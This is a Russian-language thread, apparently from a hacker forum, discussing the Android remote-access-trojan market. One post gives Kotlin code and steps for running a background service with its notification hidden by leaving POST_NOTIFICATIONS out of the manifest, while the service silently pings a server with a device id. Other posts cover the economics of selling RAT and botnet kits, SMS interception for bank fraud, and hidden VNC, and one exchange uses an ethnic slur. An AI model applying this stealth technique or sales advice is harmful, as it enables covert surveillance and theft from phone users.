Трезвый и независимый взгляд на ситуацию с Android RAT

[xakep64]

По поводу того что сяоми miui останавливает процесс это у него такое "энергосбережение"(даже если оно отключенно). На форумах ведроид разрабов вроде видел обсуждение этой темы и обходы

 

[qvp]

А мой Xiaomi Mi 8 при инсталле и при получении пермишн, начитает тупо глюкать, просто выхожу с установки и удаляю. (Ермак)

 

[qvp]

Да и вообще от последней обновы гугла до targetSdkVersion: 31, работа встала, выскакивающее окно Подозрительное приложение заблокировано(Это приложение было разработано для более ранней версии Android бля бла бла) реально инсталлы упали(

 

[Слободан Милошевич]

Немного о том, какой дырявый андроид. Как мы знаем, теперь для того, чтобы запустить фоновый сервис, нужно вывести постоянное уведомление для этого сервиса. Но можно сделать, чтобы этого уведомления не было видно!) Нужно просто в манифесте не указывать POST NOTIFICATION, но запускать фоновый сервис с уведомлением. Опять же, да да не удивляйтесь, никаких exception и крашей не будет, система технически запускает сервис с уведомлением, но так как в манифесте нет разрешения на post notification (именно в манифесте! Если в манифесте строка что приложению требуются уведомления, но на новых андроидах где это отдельное runtime разрешение, и оно не выдано, вот тогда будет exception.), то и уведомление показано не будет. Дефолтный код создания уведомления:

import android.app.Notification
import android.app.NotificationChannel
import android.app.NotificationManager
import android.app.PendingIntent
import android.app.Service
import android.content.Context
import android.content.Intent
import android.content.SharedPreferences
import android.os.IBinder
import android.util.Log
import androidx.core.app.NotificationCompat
import kotlinx.coroutines.*
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.launch
import java.net.HttpURLConnection
import java.io.OutputStream
import java.net.URL


class PingService : Service() {

    private val scope = CoroutineScope(Job() + Dispatchers.IO)


    override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {

        Log.d("stateinfoping", "onStartCommand() вызван в Pinger, сервис запущен")

        // Используйте startForegroundService для запуска сервиса
        val notification = createNotification() // Создайте уведомление
        startForeground(1, notification) // Установите сервис в режим переднего плана с уведомлением

        val message = "Пингуем..."//сообщение на сервер

        // Запускаем цикл отправки сообщений с интервалом в 30 секунд
        scope.launch {
            repeat(Int.MAX_VALUE) {
                sendPing(this@PingService, message)
                Log.d("stateinfoping", "Отправлен пинг")
                delay(10 * 1000L) // Пауза в 30 секунд (30 * 1000 миллисекунд)
            }
        }

        return START_STICKY
    }

    override fun onDestroy() {
        super.onDestroy()
        Log.d("stateinfoping", "onDestroy() вызван")
        scope.cancel()
    }

    override fun onBind(intent: Intent?): IBinder? {
        return null
    }

    private fun createNotification(): Notification {
        // Создайте канал уведомлений
        val channelId = "ping_service_channel"
        val channelName = "Ping Service Channel"
        val notificationChannel =
            NotificationChannel(channelId, channelName, NotificationManager.IMPORTANCE_DEFAULT)
        val notificationManager = getSystemService(Context.NOTIFICATION_SERVICE) as NotificationManager
        notificationManager.createNotificationChannel(notificationChannel)

        // Создайте уведомление
        val notificationIntent = Intent(this, MainActivity::class.java)

        val pendingIntent = PendingIntent.getActivity(
            this, 0, notificationIntent,
            PendingIntent.FLAG_UPDATE_CURRENT or PendingIntent.FLAG_IMMUTABLE
        )

        val notification = NotificationCompat.Builder(this, "ping_service_channel")
            .setContentTitle("Ping Service")
            .setContentText("Сервис Ping активен")
            .setSmallIcon(R.drawable.ic_launcher_background)
            .setContentIntent(pendingIntent)
            .build()

        return notification
    }

    fun sendPing(context: Context, message: String) {
        // Получение значения id из SharedPreferences
        val sharedPreferences: SharedPreferences = context.getSharedPreferences("default", Context.MODE_PRIVATE)
        val id = sharedPreferences.getString("id", "test")

        // URL сервера для отправки запроса
        val url = URL("https://yourserver.com/ping")

        // Открытие соединения
        val connection = url.openConnection() as HttpURLConnection
        connection.requestMethod = "POST"
        connection.doOutput = true
        connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded")

        // Параметры POST запроса
        val postData = "id=$id&message=$message"

        // Отправка данных
        val outputStream: OutputStream = connection.outputStream
        outputStream.write(postData.toByteArray())
        outputStream.flush()
        outputStream.close()

        // Получение ответа
        val responseCode = connection.responseCode
        val responseMessage = connection.responseMessage

        // Закрытие соединения
        connection.disconnect()

        // Вывод информации о результате запроса
        println("Response Code: $responseCode")
        println("Response Message: $responseMessage")
    }

}

Просто запускаем сервис в mainactivity:

startService(Intent(this, PingService::class.java)) //старт сервиса пинга

Сервис будет фоновым, но без уведомления. ГЛАВНОЕ НЕ ВПИСЫВАТЬ СТРОКУ:
<uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
В МАНИФЕСТЕ!

Последний раз проверял пару месяцев назад, работало на самсунге с 13 андроиде, а на пикселе(!) 14 андроида! На телефоне от самого гугла вот такая хрень прокатывает) А если в манифесте есть post notification, но рантайм на пуш не выдан, и попробовать запустить сервис в фоне с уведомлением, будет краш.
Скрины с пикселя:

 

[p4p4]

Из дома выхожу только за следующей бутылкой

выздоравливай

Ты первый раз взаимодействуешь со мной, и первым словом называешь "братан"

Сейчас время такое пошло

да время такое, называю братом каждого третьего, ибо так просто удобно когда у чела в нике српски политичар

хакерском форуме

это хакерски борд? я думал дефолт информационно-технический форум, особенно когда увидел тут новости про обман на продаже контейнеров...мысли про хакеров куда-то исчезли и вовсе

чурками я назвал тех, кто покупает паспорта России по связям

абсолютно любая нация, любой этнос/народ такой темой может промышлять... по такой логике и любые другие нации можно назвать чурками, и мы тоже чурки тогда когда к примеру в пендосию через мексику бежим

 

[m00r]

сорри, что я все о своем - о просе (==зерно).
То есть со стороны ..организационной, например, тот же Ермак - это был продукт, который продавался в открытую и незадешево.
30Кх100 =3М, а продаж совсем, совсем не 100...
И ботнет, как те пресловутые лопаты на Аляске, даст овнеру стабильный доход. Который можно контролировать находясь сверху, делегируя полномочия (саппорт, продажники).


А вот эти самые выше упомянутые ухищрения - с кнопочками, накладочками, фишами - работа в большей степени для одиночки(кодера). Да, прибыльная, но несистемная, требующая постоянного контроля-участия-модификаций, то есть "операционка".

Вот и весь расклад по симпатиям и направлениям на самом-то деле, на мой посторонний взгляд.


наверное, речь о софте, с которым можно "медленно спуститься с горы и покрыть все стадо"?. Если так, то живет он конечно не час, но доход порой проблематичен...
Или что-то другое?)
! Мур - прокомментируй,плз

да истины
можно продавать хорошие(или не очень) лопаты(хоть это изначально и лоховской движ) и зарабатывать на этом
сейчас это повсеместно и даже по подписке. да и раньше тоже было.
но все таки хороший софт в паблике это именно больше исключение из правил (анубис азорульт всякие ракуны)

а можно зарабатывать копая и чуть чуть даже чертить лопаты самим наверно именно это в духе хакерства
просто в мире где ит повсеместно в хакерство порог вхождения тоже стал ниже
отсюда и рынок и масса предложений на любой цвет вкус и скилл

добавлю факт о том что в какой то момент времени как раз лет 10 назад
из всех вирусов которые были в полях доля тех что была на виндус составляла только 4%, остальное были андроиды.

сейчас просто корпы сделали гигантсткую работу над ошибками
андроид сейчас топовый телефон а раньше какой зашквар был хахаха
человек пишет ксиоми топ!
я тачку хочу даже!!

и сейчас мы все тоже так же качаем сиемы для планеты земля и крутим колесо прогресса



наверно все таки тема топика именно про кпд
тема деликатная и сложная с высоким порогом вхождения(сейчас)
ну и как видно в паблике ведь нет даже ничего на продажу
даже как тут всегда было за огромный прайс

п.с. я думаю сейчас даже лоховской продукт можно выпустить на рынок когда на нем прям вакуум
ребята если вы искали знак выпускать апк малварь на рынок или нет то вот он
выпускайте

 

[w0nd3r]

Посмотреть вложение 89723

это который b? или который c?
Если b, то прожатие ничего не даёт, после него код смс, а в смс стена текста с полным описанием что куда. Если речь про перехват смс- то имеет место быть, как и куча фрода от этого банка, если смс вписывать в "не родное".

 

[XDRevil]

Дайте мне ВНЦ

То ВНЦ то ладно но ХВНЦ в Андроиде под большим вопросом (Его никто не сделали, грубо говоря сделали но только на суперпривате)